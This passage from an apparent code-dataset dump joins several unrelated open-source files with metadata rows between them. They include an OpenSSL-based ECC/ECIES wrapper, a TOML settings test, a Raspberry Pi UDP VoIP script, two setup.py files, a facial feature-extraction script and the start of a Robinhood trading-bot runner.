OpenSSL.ECDH_set_method(own_key, OpenSSL.ECDH_OpenSSL())
ecdh_keylen = OpenSSL.ECDH_compute_key(
ecdh_keybuffer, 32, other_pub_key, own_key, 0)
if ecdh_keylen != 32:
raise Exception("[OpenSSL] ECDH keylen FAIL ...")
return ecdh_keybuffer.raw
finally:
OpenSSL.EC_KEY_free(other_key)
OpenSSL.BN_free(other_pub_key_x)
OpenSSL.BN_free(other_pub_key_y)
OpenSSL.EC_POINT_free(other_pub_key)
OpenSSL.EC_KEY_free(own_key)
OpenSSL.BN_free(own_priv_key)
def check_key(self, privkey, pubkey):
"""
Check the public key and the private key.
The private key is optional (replace by None)
"""
curve, pubkey_x, pubkey_y, i = ECC._decode_pubkey(pubkey)
if privkey is None:
raw_privkey = None
curve2 = curve
else:
curve2, raw_privkey, i = ECC._decode_privkey(privkey)
if curve != curve2:
raise Exception("Bad public and private key")
return self.raw_check_key(raw_privkey, pubkey_x, pubkey_y, curve)
def raw_check_key(self, privkey, pubkey_x, pubkey_y, curve=None):
if curve is None:
curve = self.curve
elif type(curve) == str:
curve = OpenSSL.get_curve(curve)
else:
curve = curve
try:
key = OpenSSL.EC_KEY_new_by_curve_name(curve)
if key == 0:
raise Exception("[OpenSSL] EC_KEY_new_by_curve_name FAIL ...")
if privkey is not None:
priv_key = OpenSSL.BN_bin2bn(privkey, len(privkey), 0)
pub_key_x = OpenSSL.BN_bin2bn(pubkey_x, len(pubkey_x), 0)
pub_key_y = OpenSSL.BN_bin2bn(pubkey_y, len(pubkey_y), 0)
if privkey is not None:
if (OpenSSL.EC_KEY_set_private_key(key, priv_key)) == 0:
raise Exception(
"[OpenSSL] EC_KEY_set_private_key FAIL ...")
group = OpenSSL.EC_KEY_get0_group(key)
pub_key = OpenSSL.EC_POINT_new(group)
if (OpenSSL.EC_POINT_set_affine_coordinates_GFp(group, pub_key,
pub_key_x,
pub_key_y,
0)) == 0:
raise Exception(
"[OpenSSL] EC_POINT_set_affine_coordinates_GFp FAIL ...")
if (OpenSSL.EC_KEY_set_public_key(key, pub_key)) == 0:
raise Exception("[OpenSSL] EC_KEY_set_public_key FAIL ...")
if (OpenSSL.EC_KEY_check_key(key)) == 0:
raise Exception("[OpenSSL] EC_KEY_check_key FAIL ...")
return 0
finally:
OpenSSL.EC_KEY_free(key)
OpenSSL.BN_free(pub_key_x)
OpenSSL.BN_free(pub_key_y)
OpenSSL.EC_POINT_free(pub_key)
if privkey is not None:
OpenSSL.BN_free(priv_key)
def sign(self, inputb, digest_alg=OpenSSL.EVP_ecdsa):
"""
Sign the input with ECDSA method and returns the signature
"""
try:
size = len(inputb)
buff = OpenSSL.malloc(inputb, size)
digest = OpenSSL.malloc(0, 64)
md_ctx = OpenSSL.EVP_MD_CTX_create()
dgst_len = OpenSSL.pointer(OpenSSL.c_int(0))
siglen = OpenSSL.pointer(OpenSSL.c_int(0))
sig = OpenSSL.malloc(0, 151)
key = OpenSSL.EC_KEY_new_by_curve_name(self.curve)
if key == 0:
raise Exception("[OpenSSL] EC_KEY_new_by_curve_name FAIL ...")
priv_key = OpenSSL.BN_bin2bn(self.privkey, len(self.privkey), 0)
pub_key_x = OpenSSL.BN_bin2bn(self.pubkey_x, len(self.pubkey_x), 0)
pub_key_y = OpenSSL.BN_bin2bn(self.pubkey_y, len(self.pubkey_y), 0)
if (OpenSSL.EC_KEY_set_private_key(key, priv_key)) == 0:
raise Exception("[OpenSSL] EC_KEY_set_private_key FAIL ...")
group = OpenSSL.EC_KEY_get0_group(key)
pub_key = OpenSSL.EC_POINT_new(group)
if (OpenSSL.EC_POINT_set_affine_coordinates_GFp(group, pub_key,
pub_key_x,
pub_key_y,
0)) == 0:
raise Exception(
"[OpenSSL] EC_POINT_set_affine_coordinates_GFp FAIL ...")
if (OpenSSL.EC_KEY_set_public_key(key, pub_key)) == 0:
raise Exception("[OpenSSL] EC_KEY_set_public_key FAIL ...")
if (OpenSSL.EC_KEY_check_key(key)) == 0:
raise Exception("[OpenSSL] EC_KEY_check_key FAIL ...")
OpenSSL.EVP_MD_CTX_init(md_ctx)
OpenSSL.EVP_DigestInit_ex(md_ctx, digest_alg(), None)
if (OpenSSL.EVP_DigestUpdate(md_ctx, buff, size)) == 0:
raise Exception("[OpenSSL] EVP_DigestUpdate FAIL ...")
OpenSSL.EVP_DigestFinal_ex(md_ctx, digest, dgst_len)
OpenSSL.ECDSA_sign(0, digest, dgst_len.contents, sig, siglen, key)
if (OpenSSL.ECDSA_verify(0, digest, dgst_len.contents, sig,
siglen.contents, key)) != 1:
raise Exception("[OpenSSL] ECDSA_verify FAIL ...")
return sig.raw[:siglen.contents.value]
finally:
OpenSSL.EC_KEY_free(key)
OpenSSL.BN_free(pub_key_x)
OpenSSL.BN_free(pub_key_y)
OpenSSL.BN_free(priv_key)
OpenSSL.EC_POINT_free(pub_key)
OpenSSL.EVP_MD_CTX_destroy(md_ctx)
def verify(self, sig, inputb, digest_alg=OpenSSL.EVP_ecdsa):
"""
Verify the signature with the input and the local public key.
Returns a boolean
"""
try:
bsig = OpenSSL.malloc(sig, len(sig))
binputb = OpenSSL.malloc(inputb, len(inputb))
digest = OpenSSL.malloc(0, 64)
dgst_len = OpenSSL.pointer(OpenSSL.c_int(0))
md_ctx = OpenSSL.EVP_MD_CTX_create()
key = OpenSSL.EC_KEY_new_by_curve_name(self.curve)
if key == 0:
raise Exception("[OpenSSL] EC_KEY_new_by_curve_name FAIL ...")
pub_key_x = OpenSSL.BN_bin2bn(self.pubkey_x, len(self.pubkey_x), 0)
pub_key_y = OpenSSL.BN_bin2bn(self.pubkey_y, len(self.pubkey_y), 0)
group = OpenSSL.EC_KEY_get0_group(key)
pub_key = OpenSSL.EC_POINT_new(group)
if (OpenSSL.EC_POINT_set_affine_coordinates_GFp(group, pub_key,
pub_key_x,
pub_key_y,
0)) == 0:
raise Exception(
"[OpenSSL] EC_POINT_set_affine_coordinates_GFp FAIL ...")
if (OpenSSL.EC_KEY_set_public_key(key, pub_key)) == 0:
raise Exception("[OpenSSL] EC_KEY_set_public_key FAIL ...")
if (OpenSSL.EC_KEY_check_key(key)) == 0:
raise Exception("[OpenSSL] EC_KEY_check_key FAIL ...")
OpenSSL.EVP_MD_CTX_init(md_ctx)
OpenSSL.EVP_DigestInit_ex(md_ctx, digest_alg(), None)
if (OpenSSL.EVP_DigestUpdate(md_ctx, binputb, len(inputb))) == 0:
raise Exception("[OpenSSL] EVP_DigestUpdate FAIL ...")
OpenSSL.EVP_DigestFinal_ex(md_ctx, digest, dgst_len)
ret = OpenSSL.ECDSA_verify(
0, digest, dgst_len.contents, bsig, len(sig), key)
if ret == -1:
return False # Fail to Check
else:
if ret == 0:
return False # Bad signature !
else:
return True # Good
return False
finally:
OpenSSL.EC_KEY_free(key)
OpenSSL.BN_free(pub_key_x)
OpenSSL.BN_free(pub_key_y)
OpenSSL.EC_POINT_free(pub_key)
OpenSSL.EVP_MD_CTX_destroy(md_ctx)
@staticmethod
def encrypt(data, pubkey, ephemcurve=None, ciphername='aes-256-cbc'):
"""
Encrypt data with ECIES method using the public key of the recipient.
"""
curve, pubkey_x, pubkey_y, i = ECC._decode_pubkey(pubkey)
return ECC.raw_encrypt(data, pubkey_x, pubkey_y, curve=curve,
ephemcurve=ephemcurve, ciphername=ciphername)
@staticmethod
def raw_encrypt(data, pubkey_x, pubkey_y, curve='sect283r1',
ephemcurve=None, ciphername='aes-256-cbc'):
if ephemcurve is None:
ephemcurve = curve
ephem = ECC(curve=ephemcurve)
key = sha512(ephem.raw_get_ecdh_key(pubkey_x, pubkey_y)).digest()
key_e, key_m = key[:32], key[32:]
pubkey = ephem.get_pubkey()
iv = OpenSSL.rand(OpenSSL.get_cipher(ciphername).get_blocksize())
ctx = Cipher(key_e, iv, 1, ciphername)
ciphertext = iv + pubkey + ctx.ciphering(data)
mac = hmac_sha256(key_m, ciphertext)
return ciphertext + mac
def decrypt(self, data, ciphername='aes-256-cbc'):
"""
Decrypt data with ECIES method using the local private key
"""
blocksize = OpenSSL.get_cipher(ciphername).get_blocksize()
iv = data[:blocksize]
i = blocksize
curve, pubkey_x, pubkey_y, i2 = ECC._decode_pubkey(data[i:])
i += i2
ciphertext = data[i:len(data)-32]
i += len(ciphertext)
mac = data[i:]
key = sha512(self.raw_get_ecdh_key(pubkey_x, pubkey_y)).digest()
key_e, key_m = key[:32], key[32:]
if not equals(hmac_sha256(key_m, data[:len(data) - 32]), mac):
raise RuntimeError("Fail to verify data")
ctx = Cipher(key_e, iv, 0, ciphername)
return ctx.ciphering(ciphertext)
| gpl-2.0 | -4,182,418,134,125,974,000 | 39.130152 | 79 | 0.517622 | false |
drgarcia1986/simple-settings | tests/strategies/test_toml.py | 1 | 1306 | import pytest
skip = False
try:
from simple_settings.strategies.toml_file import SettingsLoadStrategyToml
except ImportError:
skip = True
@pytest.mark.skipif(skip, reason='Installed without Toml')
class TestTomlStrategy:
@pytest.fixture
def strategy_toml(self):
return SettingsLoadStrategyToml
def test_should_check_a_valid_toml_file(self, strategy_toml):
assert strategy_toml.is_valid_file('foo.toml') is True
def test_should_check_a_invalid_toml_file(self, strategy_toml):
assert strategy_toml.is_valid_file('foo.bar') is False
def test_should_load_dict_with_settings_of_toml_file(self, strategy_toml):
settings = strategy_toml.load_settings_file(
'tests/samples/simple_toml_file.toml'
)
assert settings['SIMPLE_STRING'] == 'simple'
assert settings['COMPLEX_DICT'] == {'complex': 'dict', 'foo': 'bar'}
assert settings['COMPLEX_LIST'] == ['foo', 'bar']
assert settings['SIMPLE_INTEGER'] == 1
assert settings['SIMPLE_BOOL'] is True
def test_should_raise_error_invalid_toml_file_content(self, strategy_toml):
with pytest.raises(Exception):
settings = strategy_toml.load_settings_file(
'tests/samples/invalid_toml_file.toml'
)
| mit | -2,855,346,663,281,709,600 | 33.368421 | 79 | 0.663859 | false |
javidombro/CGR | voip_p2p.py | 1 | 7182 | #!/usr/bin/env python3
import pyaudio
import socket
import sys
import zlib
import time
import threading
from threading import Thread
import argparse
import audioop
from threading import Timer
import RPi.GPIO as gpio
dicIPSO = {} #Diccionario IP - StreamOutput
recordEvent = threading.Event()
clientEvent = threading.Event()
exitFlag = False
debug = True
squelch = False
squelchValue = 0
mask_tx = ""
mask_rx = []
IP = ""
IPBroadcast = "255.255.255.255"
addr = ""
ptt_timer = ""
gpioEnable = False
port = ""
FORMAT = pyaudio.paInt16
CHUNK = 2205
CHANNELS = 1
RATE = 44100
udp = ""
pi = pyaudio.PyAudio()
streamInput = ""
def pdebug(tPrint):
global debug
if debug:
print(tPrint)
def exitVoip():
global exitFlag
exitFlag = True
def set_squelch(pValue):
global squelchValue
squelchValue = pValue
pdebug("Squelch seteado a: "+ str(squelchValue))
def squelch_on():
global squelch
squelch = True
pdebug("Squelch Encendido")
def squelch_off():
global squelch
squelch = False
pdebug("Squelch Apagado")
def squelch_toggle():
global squelch
if squelch:
squelch_off()
else:
squelch_on()
def sel_masc_rx(pMask_rx):
global mask_rx
if not (pMask_rx in mask_rx):
mask_rx.append(pMask_rx)
pdebug("Mascara de Recepcion "+ pMask_rx.decode("utf-8") + " agregada")
def desel_masc_rx(pMask_rx):
global mask_rx
if pMask_rx in mask_rx:
mask_rx.remove(pMask_rx)
pdebug("Mascara de Recepcion " + pMask_rx.decode("utf-8") + " removida")
def sel_masc_tx(pMask_tx):
global mask_tx
mask_tx = pMask_tx
pdebug("Mascara de Transmision seteada a: " + pMask_tx.decode("utf-8"))
def set_IP(pIP):
global IP
IP = pIP
pdebug("IP Seteada a: " + pIP)
def get_masc_rx():
return mask_rx
def getStreamOutput(IPP):
#IPP = IP Parametro
#Devuelve el StreamOutput asociado a la IP, si no existe, lo crea y lanza un Thread asociado a dicho stream
if IPP in dicIPSO:
return(dicIPSO[IPP])
else:
po = pyaudio.PyAudio()
streamOutput = po.open(format=FORMAT,
channels=CHANNELS,
rate=RATE,
output=True,
frames_per_buffer=CHUNK
)
dicIPSO[IPP] = streamOutput #Mapeamos la IP al StreamOutput
return(streamOutput)
#Server Methods
def tServer(CHUNK):
global exitFlag
global IP
global mask_rx
global ptt_timer
global gpioEnable
udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udp.bind(('', port))
iprecive = ""
silence = chr(0)*2
while (not exitFlag):
try:
udpData, addr = udp.recvfrom(CHUNK+8)
iprecive = addr[0]
compMascara = udpData[:8]
if (not(iprecive == IP) and (compMascara in mask_rx)):
if gpioEnable:
#Activamos el PTT de VHF
ptt_timer.cancel()
ptt_timer = Timer(1.0,timeout)
ptt_timer.start()
gpio.output(18,True)
encSoundData = udpData[8:]
#Decodificamos el audio
soundData = audioop.alaw2lin(encSoundData,2)
#obtenemos el framesOutput correspondiente a la IP
so = getStreamOutput(iprecive)
so.write(soundData,CHUNK)
#print(silence)
free = so.get_write_available() # How much space is left in the buffer?
#print(free)
if free > CHUNK: # Is there a lot of space in the buffer?
tofill = free - CHUNK
so.write(silence * tofill) # Fill it with silence
except:
pass
udp.close()
def enableGPIO():
global gpioEnable
gpio.setmode(gpio.BCM)
gpio.setup(18,gpio.OUT)
gpioEnable = True
def disableGPIO():
global gpioEnable
gpioEnable = False
def callbackInput(in_data, frame_count, time_info, status):
global udp
global clientEvent
global streamInput
audio = in_data
encSoundData = audioop.lin2alaw(audio,2)
#Agregamos la mascara (La mascara DEBE estar en BYTEARRAY)
tosend = bytearray()
tosend.extend(mask_tx)
tosend.extend(encSoundData)
ids = str(len(in_data))
fcs = str(frame_count)
#print("INDATA = "+ids)
#print("FRAMECOUNT = "+ fcs)
#print("MANDANDO")
udp.sendto(tosend, (IPBroadcast, port))
return (audio, pyaudio.paContinue)
def ptt_on():
global streamInput
streamInput.start_stream()
pdebug("PTT Presionado")
#print("Despertar Thread Record")
def ptt_on(ip):
global streamInput
global IPBroadcast
streamInput.start_stream()
pdebug("PTT Presionado")
IPBroadcast = ip
# print("Despertar Thread Record")
def ptt_off():
global streamInput
streamInput.stop_stream()
pdebug("PTT Liberado")
def faltante():
if (IP == ""):
return("IP")
else:
if(mask_tx == ""):
return("Mascara de Transmision")
def get_ip():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
# doesn't even have to be reachable
s.connect(('10.255.255.255', 0))
IP = s.getsockname()[0]
except:
IP = '127.0.0.1'
finally:
s.close()
return IP
def timeout():
global ptt_timer
gpio.output(18,False)
def start(setgpioEnable=False):
global IP
global streamInput
global udp
global ptt_timer
global gpioEnable
global port
gpioEnable = setgpioEnable
if not gpioEnable:
pdebug("VOIP en modo CLIENTE")
else:
pdebug("VOIP en modo Conexion GPIO")
port = 50001
IP = get_ip()
sel_masc_tx(b'\x00\x00\x00\x00\x00\x00\x00\x01')
sel_masc_rx(b'\x00\x00\x00\x00\x00\x00\x00\x01')
udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udp.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1) #Para habilitar el Broadcast
if IP == "" or mask_tx == "":
ErrorFalta = faltante()
print("Por favor especifique la " + ErrorFalta)
else:
pdebug("IP seteada a: " + IP)
pdebug("Mascara de Transmision seteada a: " + mask_tx.decode("utf-8") )
#Server
#print("Preparando Stream de Grabacion...")
streamInput = pi.open(format = FORMAT,
channels = CHANNELS,
rate = RATE,
input = True,
frames_per_buffer = CHUNK,
stream_callback = callbackInput
)
streamInput.stop_stream()
if gpioEnable:
ptt_timer = Timer(1.0, timeout)
gpio.setmode(gpio.BCM)
gpio.setup(18,gpio.OUT)
#print("Activando Server...")
TServer = Thread(target = tServer, args=(CHUNK,))
TServer.setDaemon(True)
TServer.start()
| gpl-3.0 | -7,545,945,220,337,320,000 | 24.468085 | 111 | 0.574353 | false |
Zentyal/zentyal-swift-middleware | setup.py | 1 | 1147 | #!/usr/bin/python
# Copyright 2012 OpenStack, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from setuptools import setup
import swift3
setup(name='swift3',
version=swift3.version,
description='Swift AmazonS3 API emulation Middleware',
author='OpenStack, LLC.',
author_email='[email protected]',
url='https://github.com/fujita/swift3',
packages=['swift3'],
requires=['swift(>=1.4)', 'python_dateutil(>=2.1)'],
entry_points={'paste.filter_factory':
['swift3=swift3.middleware:filter_factory',
's3auth=swift3.auth:filter_factory']})
| apache-2.0 | 703,918,658,693,047,300 | 36 | 74 | 0.691369 | false |
maguro/flask-MenuManager | setup.py | 1 | 2624 | # !/usr/bin/env python
#
# (C) Copyright 2014 Alan Cabrera
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from io import open
import sys
from setuptools import setup
from setuptools.command.test import test as TestCommand
class ToxCommand(TestCommand):
user_options = [('tox-args=', 'a', "Arguments to pass to tox")]
def initialize_options(self):
TestCommand.initialize_options(self)
self.tox_args = ''
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = []
self.test_suite = True
def run_tests(self):
# import here, cause outside the eggs aren't loaded
import tox
import shlex
errno = tox.cmdline(args=shlex.split(self.tox_args))
sys.exit(errno)
setup(
name='flask-MenuManager',
version='1.0',
url='https://github.com/maguro/flask-MenuManager/',
license='Apache License (http://www.apache.org/licenses/LICENSE-2.0)',
author='Alan Cabrera',
author_email='[email protected]',
description='An easy way to build and manage menus in Flask',
# don't ever depend on refcounting to close files anywhere else
long_description=open('README.md', encoding='utf-8').read(),
package_dir={'': 'src'},
packages=['flask_MenuManager'],
zip_safe=False,
platforms='any',
install_requires=[
'Flask'
],
tests_require=['tox'],
cmdclass={'test': ToxCommand},
classifiers=[
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Topic :: Software Development :: Libraries :: Python Modules',
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.3",
"Programming Language :: Python :: 3.4",
],
)
| apache-2.0 | 7,186,223,080,216,033,000 | 29.870588 | 74 | 0.650915 | false |
marcusangeloni/smc2016 | processing/feature_extraction.py | 1 | 9777 | #!/usr/bin/env python
# vim: set fileencoding=utf-8 :
# Marcus de Assis Angeloni <[email protected]>
# Thu 7 Apr 2016 21:12:03
import numpy
import bob.ip.base
import bob.ip.gabor
import os
import sys
import math
import skimage.feature
from skimage.feature import greycomatrix, greycoprops
from scipy.stats import itemfreq
import argparse
from datetime import datetime
# compute tan and triggs illumination
def compute_tanTriggs(image):
tt = bob.ip.base.TanTriggs(gamma = 0.2,
sigma0 = 1.,
sigma1 = 2.,
radius = 5,
threshold = 10.,
alpha = 0.1)
data = tt(image)
return data
# compute gray-level co-occurrence matrix descriptor
def compute_glcm(image):
glcm = greycomatrix(image,
distances = [1, 2, 3, 4],
angles = [0, numpy.pi/4, numpy.pi/2, 3*numpy.pi/4],
levels = 256,
symmetric = False,
normed = True)
features = numpy.zeros((6, glcm.shape[2] * glcm.shape[3]), dtype = numpy.float64)
features[0, :] = greycoprops(glcm, 'contrast').flatten()
features[1, :] = greycoprops(glcm, 'energy').flatten()
features[2, :] = greycoprops(glcm, 'homogeneity').flatten()
features[3, :] = greycoprops(glcm, 'dissimilarity').flatten()
features[4, :] = greycoprops(glcm, 'correlation').flatten()
features[5, :] = greycoprops(glcm, 'ASM').flatten()
return features
# compute 2D Discrete Cosine Transform descriptor
def compute_dct(image):
# block = 12x12, overlap = 11x11, normalized block, normalized features
dct = bob.ip.base.DCTFeatures(coefficients = 45,
block_size = (12, 12),
block_overlap = (11, 11),
normalize_block = True,
normalize_dct = True)
features = dct(image)
return features
# compute local binary patterns
def compute_lbp(image, P, R, blockSize, overlap):
stepY = blockSize[0] - overlap[0]
stepX = blockSize[1] - overlap[1]
bins = P * (P - 1) + 3
lbp = bob.ip.base.LBP(neighbors = P,
radius = R,
circular = True,
to_average = False,
add_average_bit = False,
uniform = True,
rotation_invariant = False)
lbpImage = lbp(image)
nBlocksY = (lbpImage.shape[0] - overlap[0]) // stepY
nBlocksX = (lbpImage.shape[1] - overlap[1]) // stepX
totalBlocks = nBlocksY * nBlocksX
features = numpy.zeros((totalBlocks, bins), dtype = numpy.float64)
idx = 0
y1 = 0
y2 = blockSize[0]
while (y2 <= lbpImage.shape[0]):
x1 = 0
x2 = blockSize[1]
while (x2 <= lbpImage.shape[1]):
block = lbpImage[y1:y2, x1:x2]
values = itemfreq(block.ravel())
for v in values:
features[idx, int(v[0])] = v[1]
x1 += stepX
x2 += stepX
idx += 1
y1 += stepY
y2 += stepY
return features
# compute multiscale local binary pattern descriptor
def compute_mlbp(image, P, blockSize, overlap):
# R = 1
features_r1 = compute_lbp(image[2:image.shape[0]-2, 2:image.shape[1]-2], P, 1, blockSize, overlap) # to get the same dimension of radius = 3
# R = 3
features_r3 = compute_lbp(image, P, 3, blockSize, overlap)
features = numpy.concatenate((features_r1, features_r3), axis=1)
return features
# compute histogram of oriented gradients
def compute_hog(image, pixels_cell):
features = skimage.feature.hog(image,
orientations = 9,
pixels_per_cell = pixels_cell,
cells_per_block=(1, 1))
return features
# compute histogram of oriented gradients descriptor
def compute_hog_descriptor(image):
# blocos de 4x4
features_b4 = compute_hog(image, (4, 4))
#bloco de 8x8
features_b8 = compute_hog(image, (8, 8))
features = numpy.concatenate((features_b4, features_b8))
return features
# compute gabor wavelet descriptor
def compute_gabor(image):
gwt = bob.ip.gabor.Transform(number_of_scales = 5,
number_of_directions = 8,
sigma = 2 * math.pi,
k_max = math.pi / 2.,
k_fac = math.sqrt(.5),
power_of_k = 0,
dc_free = True)
image_c = image.astype(numpy.complex128)
trafo_image = gwt.transform(image_c)
features = numpy.abs(trafo_image)
return features
#################
# main block
#################
# Get arguments
parser = argparse.ArgumentParser(description='Feature extraction')
parser.add_argument('image_dir', default='', help='Image directory root (with facial parts folders and npy files)')
parser.add_argument('output_dir', default='', help='Output directory with extracted features')
parser.add_argument('features', default='', help='Features to be extracted [all, dct, mlbp, hog, gabor, glcm]')
args = parser.parse_args()
if (not(os.path.exists(args.image_dir))):
print('Image directory root (\"' + args.image_dir + '\") not found.')
exit()
if (not(os.path.exists(args.output_dir))):
os.mkdir(args.output_dir)
if not(args.features in ['all', 'dct', 'mlbp', 'hog', 'gabor', 'glcm']):
print('Features not implemented (\"' + args.image_dir + '\"). Available: [all, dct, mlbp, hog, gabor, glcm]')
exit()
image_dir = args.image_dir
output_dir = args.output_dir
features = args.features
print(datetime.now().strftime('%d/%m/%Y %H:%M:%S') + " - feature extraction started")
print("Image directory: " + image_dir)
print("Output directory: " + output_dir)
print("Selected features: " + features)
partList = os.listdir(image_dir)
for part in partList:
in_part_dir = os.path.join(image_dir, part)
print (in_part_dir)
if (not(os.path.isdir(in_part_dir))):
continue
print (datetime.now().strftime('%d/%m/%Y %H:%M:%S') + " - Current facial part " + part)
out_part_dir = os.path.join(output_dir, part)
# create feature directories
if (not(os.path.exists(out_part_dir))):
os.mkdir(out_part_dir)
if (features in ['all', 'dct']):
dct_dir = os.path.join(out_part_dir, 'dct')
if (not(os.path.exists(dct_dir))):
os.mkdir(dct_dir)
if (features in ['all', 'mlbp']):
mlbp_dir = os.path.join(out_part_dir, 'mlbp')
if (not(os.path.exists(mlbp_dir))):
os.mkdir(mlbp_dir)
if (features in ['all', 'hog']):
hog_dir = os.path.join(out_part_dir, 'hog')
if (not(os.path.exists(hog_dir))):
os.mkdir(hog_dir)
if (features in ['all', 'gabor']):
gabor_dir = os.path.join(out_part_dir, 'gabor')
if (not(os.path.exists(gabor_dir))):
os.mkdir(gabor_dir)
if (features in ['all', 'glcm']):
glcm_dir = os.path.join(out_part_dir, 'glcm')
if (not(os.path.exists(glcm_dir))):
os.mkdir(glcm_dir)
images = os.listdir(in_part_dir)
for i in images:
if (i[len(i)-3:len(i)] != 'npy'): # check the file extension
continue
print (datetime.now().strftime('%d/%m/%Y %H:%M:%S') + " - Current file " + i)
img = numpy.load(os.path.join(in_part_dir, i))
tt_img = compute_tanTriggs(img)
if (features in ['all', 'dct']):
descriptor = compute_dct(tt_img)
numpy.save(os.path.join(dct_dir, i), descriptor)
if (features in ['all', 'gabor']):
descriptor = compute_gabor(tt_img)
numpy.save(os.path.join(gabor_dir, i), descriptor)
if (features in ['all', 'glcm']):
descriptor = compute_glcm(img) # without tan and triggs
numpy.save(os.path.join(glcm_dir, i), descriptor)
if (features in ['all', 'hog']):
# remove border according to each facial
if (part =='eyebrows'):
img_hog = tt_img[2:18, 3:139]
elif (part =='eyes'):
img_hog = tt_img[3:27, 2:154]
elif (part == 'nose'):
img_hog = tt_img[1:113, 1:161]
elif (part == 'mouth'):
img_hog = tt_img[1:81, 3:139]
else:
img_hog = None
print('HOG not calculated due to facial part is unknown (' + part + ')')
if not(img_hog is None):
descriptor = compute_hog_descriptor(img_hog)
numpy.save(os.path.join(hog_dir, i), descriptor)
if (features in ['all', 'mlbp']):
# neighbors, block size and overlap according to each facial part
if (part in ['eyebrows', 'eyes']):
descriptor = compute_mlbp(tt_img, 8, (8, 8), (4, 4))
elif (part == 'nose'):
descriptor = compute_mlbp(tt_img, 8, (16, 16), (8, 8))
elif (part == 'mouth'):
descriptor = compute_mlbp(tt_img, 4, (16, 16), (8, 8))
else:
descriptor = None
print('MLBP not calculated due to facial part is unknown (' + part + ')')
if not(descriptor is None):
numpy.save(os.path.join(mlbp_dir, i), descriptor)
print(datetime.now().strftime('%d/%m/%Y %H:%M:%S') + " - feature extraction finished") | apache-2.0 | -5,217,122,152,457,738,000 | 33.797153 | 144 | 0.542293 | false |
codesociety/friartuck | friar_tuck_run.py | 1 | 5477 | """
MIT License
Copyright (c) 2017 Code Society
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import time
import argparse
import sys
from friartuck.api import FriarTuckLive, Order
import logging
from os import path
import configparser
parser = argparse.ArgumentParser(description='FriarTuck Quant Robinhood Broker Application')
parser.add_argument('--algo_script', action="store", dest="algo_script", help="Algorithm script file")
parser.add_argument('--config_file', action="store", dest="config_file",
help="Configuration file which should include credentials")
parser.add_argument('--data_frequency', action="store", dest="data_frequency",
help="[1m, 5m, 15m, 1h, 1d] The frequency of bar data... default is 1h")
# parser.add_argument('--tzone', action="store", dest="tzone", help="Time_zone")
log = logging.getLogger("friar_tuck")
PATH = path.abspath(path.dirname(__file__))
ROOT = path.dirname(PATH)
friar_tuck = None
def get_config(config_filename):
friar_config = configparser.ConfigParser(
interpolation=configparser.ExtendedInterpolation(),
allow_no_value=True,
delimiters='=',
inline_comment_prefixes='#'
)
local_filename = config_filename.replace('.cfg', '_local.cfg')
if path.isfile(local_filename):
config_filename = local_filename
with open(config_filename, 'r') as file:
friar_config.read_file(file)
return friar_config
def get_datetime():
return friar_tuck.get_datetime()
def lookup_security(symbol):
return friar_tuck.fetch_and_build_security(symbol)
def get_order(order):
# Checking to see if the order is the Order object, if yes, use the id
if isinstance(order, Order):
return friar_tuck.get_order(order.id)
return friar_tuck.get_order(order)
def get_last_filled_buy_order(security):
return friar_tuck.get_last_filled_buy_order(security=security)
def get_last_filled_sell_order(security):
return friar_tuck.get_last_filled_sell_order(security=security)
def get_last_filled_orders_by_side(security):
return friar_tuck.get_last_filled_orders_by_side(security=security)
def get_open_orders(security=None):
return friar_tuck.get_open_orders(security)
def cancel_order(order):
# Checking to see if the order is the Order object, if yes, use the id
if isinstance(order, Order):
return friar_tuck.cancel_order(order.id)
return friar_tuck.cancel_order(order)
def order_shares(security, shares, order_type=None, time_in_force='gfd'):
return friar_tuck.order_shares(security, shares, order_type, time_in_force)
def order_value(security, amount, order_type=None, time_in_force='gfd'):
return friar_tuck.order_value(security, amount, order_type, time_in_force)
def start_engine(input_args):
args = parser.parse_args(input_args)
global trading_algo, config
trading_algo = __import__(args.algo_script)
config_file = args.config_file
data_frequency = args.data_frequency
if not data_frequency:
data_frequency = "1h"
CONFIG_FILENAME = path.join(PATH, config_file)
config = get_config(CONFIG_FILENAME)
# os.environ['TZ'] = 'US/Eastern'
# time.tzset()
if (not config.get('LOGIN', 'username')) or (not config.get('LOGIN', 'password')):
exit('no login credentials given')
